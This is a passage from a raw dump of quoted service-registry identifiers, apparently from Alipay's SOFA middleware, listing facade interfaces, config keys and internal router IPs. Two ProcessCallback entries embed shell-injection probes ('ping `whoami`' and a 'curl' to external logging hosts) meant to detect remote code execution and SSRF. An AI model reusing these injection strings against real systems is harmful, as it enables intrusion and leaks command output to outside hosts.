vice.integration.drm.DrmCdsManager.sceneCodeIgnoredRcpNormalEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cssocial.common.service.facade.YqMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.recNeptuneRecActivityConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_DMS_SHARED#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfcenter.common.service.facade.SettlementBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.asdi.AsdiDumpServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.contentlib.common.service.facade.livekit.LiveAnchorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promocenter_activityAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cloud.opsware.executor.facade.admin.ExecutorMetadataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.etetestcore.service.api.KoubeiOnlinePayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:instinfo.demo.product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.yfdwebTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.CommonCmdConfigDrm.batchDeductSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkpayplatform.common.service.facade.api.pay.CommonBizPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mdeviceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.topic.TopicTrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.cffilefactory.facade.query.FileQueryFacade:1.0:mlscfilefactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.core.service.repository.quotation.GoldPriceHisRepository:1.0:memoryCachedGoldPriceHisRepository@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";ping `whoami`GIYHU5BSMQWTC5LVPJRW2LLVNZUXC5LFJFSC2ZBZOM3WY6LBOQ------.rce.scan.noble.dn5l0g.co;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.SceneAdminQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.CliveVisitorService:1.0.0:clive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundselling.common.service.tradequery.facade.TransactionQueryDetailService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:scardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filefactory.service.facade.FileCompareService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.AssetCashingApplyRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.core.service.repository.cashbackmall.CashBackOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcloanpromo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instriskcenter.facade.api.InstCooperationBusinessManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.10.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.facade.api.operatorlog.OperatorLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundcore.common.service.facade.FixedContractDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.account.service.FinsignAccountRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:proxy-override@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:settlementprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","csshield@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_S_BKMERCHANTSETTLE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.invoicetochain.common.service.facade.api.UnifiedDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfocore.common.service.facade.client.FinfoTransClientConfig:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.apipay.instportal.common.service.facade.spi.gateway.ApiInvokeService:1.0:bkbots@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finzyprod.facade.dispose.api.ZyLiquidateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctuevent.IntlEventQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.InsBlogDrmClient.blogConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_1251#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.159.193.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseClusterOpsFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ebppcore.facade.confmng.ProductConfMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.73.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.open.spi.ActivityComponentExtensionService:1.0:mrchservbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mockapp:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.pricecenter.common.service.facade.migrate.PriceMigrateInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openitemcore.common.service.facade.api.catalog.CatalogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.migrate.drm.SceneMigrateTaskDrm.bizSwitchInterceptSceneTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanpromo.service.PointExchangeBenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.video.api.ShortVideoOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.Arch:name=com.alipay.xts.ldc.chargefront.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxianprod.common.facade.BusVoucherFacde:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.rate.triple.RateQueryTriple:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.116.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.merchantdataview.HbaseQueryDataviewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:adgdcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:loanopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wealthyuebaoshareactivitytwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PROGOV#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uif.facade.consist.UifDataConsistQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.device.message.manager.DeviceMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmng.service.facade.ctrl.FinmngWSControlService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.securityidentify.EntOperatorInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_FINBATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.datacontextlib.inspector.api.InspectorConfigurationService:1.0:zdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infostudio.facade.runtime.ability.AbilityRuntimeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.46.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.common.service.facade.product.spi.SecurityProductChecker:1.0:ctu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_IGUAPCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@ropservice#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finassetpreference.api.facade.StrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.enroll.EnrollMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.PermissionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.resource.common.facade.api.FlinkResourceOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.prototype.ActivityQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:guardianconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.benefit.facade.view.BenefitGrayStrategyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instinfo.service.facade.info.InstInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.OverdueInstanceSofaRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipayplus.mobile.component.amcs.realtimeconfig.facade.ConfigPublishCallback:1.0:appcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundAssetProfitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:workflowMatterAfterDealCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.cache.MappprodCacheCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.feedback.MiniAppFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.zdalProxySchemas,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.rule.biz.manager.config.RulemnglibManagerResource.rulemnglibConfigurationJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.business.platform.outsideasset.facade.OutsideAssetBindRelationServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.BizFailCloseCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antfinancial.antchain.cloud.endpoint.facade.OracleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_CATERING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tss.supportprod.facade.bdsv2.facade.BdsItemInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmac.common.service.facade.PLCouponValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ichecker.service.facade.auditorod.AuditprodTriggerUploadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aixgw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbinventorycenter.common.service.facade.api.InventoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.EnumInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.platform.xts.bacs.api.DtapConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.autoinsprod.common.insure.v2.AutoTradeFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturemng.portable.sql.facade.FeatureCleanJobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.OperationConfigCallbackFacade:1.0:ipsponsorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.execute.DataExecuteDriver:1.0:paycoreScheduleExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.background.BackgroundManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillFamilyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MNOTIFY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_materialGatewayFacadeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_FRDECISION#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openinsight.common.service.facade.box.api.ServiceBoxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.OperationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINHADECISION#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITAUTHASSET#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antmember.common.service.facade.growthplus.groupgrowth.ExchangeStrategyOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.nodejs.ConsumerService:1.0:finadvisorbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.servicelibrary.ServiceLibrarySynQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.resource.common.facade.spi.RecycleSpi:1.0:dpgather@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.auto2.AutoMonitorFacade:1.0:govbizwebdeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantSubQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.244.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.investtrade.facade.api.security.SecurityDealPpaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.charge:name=com.alipay.zcache.tbase.customerv2_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.facade.api.acctrans.AcctransBatchPayProdTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:revmng-adjustBill@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.tenant.cifperm.logFilterJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskmng.common.service.facade.api.TaskInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mobilesecurity@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.247#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:promox@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.plugin.PluginServiceOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloandecision.common.service.facade.trans.api.BillCreditTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instrtdecision.common.service.facade.api.InstAbilityMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.GenericConfigManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.playcenter.PlayTemplateMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.237.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.msecuritycore.service.policy.inner.service.SecurityValidatePolicyServiceForUct:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:pcreditmarket@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.mdata.MdataFrontFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.176.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ipromofront.common.service.facade.service.rpc.MdeductSignInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:rating@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rtss.common.service.facade.MerchantCommercialService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.after.InvestFundManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.HotInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_HSF_CALLBACK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.177.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.adcenter.common.service.facade.monkey.MonkeyManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.BackendItemCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mirrorprod.facade.gateway.service.MirrorRegressionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_campApproveSuccessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.rest.meta.RestMetaCatalogService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.ptcore.common.service.facade.api.ctemplate.ConditionTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:huanyu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msgopprod.common.service.facade.templatemsg.BatchTemplateMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowSupportGroupFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.101.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lifemng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imatchfacade.arrange.ArrangeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.InstanceQueryApi:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.minicenter.common.service.facade.api.create.MiniAppCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilesearch.common.service.facade.WeatherServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.query.AreaAdcodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.sci.SciBenefitConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.acsellcore.common.service.facade.ResUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:antmember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettle.facade.api.PayContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rconehub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.113.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.msg.MsgContentAuditingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.indexCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";curl http://MzMwMjQ4NjktdW5pcXVlSWQtMTA0MDAzMDMx.ssrf.noble.log.lynnshare.cc;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.biz.service.impl.rpc.ComplainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.AntbsppTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.retry.task.execute.RetryOrderDRMResource.nextEndMinute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alideviceinfo.common.service.facade.moneybox.MbTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostUrlList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:AsopRiskReport_AntprocessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_COUNTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mdeduct.biz.agreement.internal.operation.IRemoteAgreementOperator:1.0:remoteTwoPartyUsageAgreementUnsignOperator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.208.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbretailprod.common.facade.activity.camp.CampServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.OrderQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.membertangram.common.service.facade.onestop.ComponentConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.p2p.product.service.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.variable.facade.VariableClient:1.0:securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.order.v2.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.171.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dataphin.schedule.operation.platform.facade.instance.FlowServiceApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.SpiConfigSaveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbleadscenter.common.service.facade.label.LabelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DomainMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.addpLoadtestTair.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.tis.service.IdCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.DocCheckUtilFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.36.12.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.Process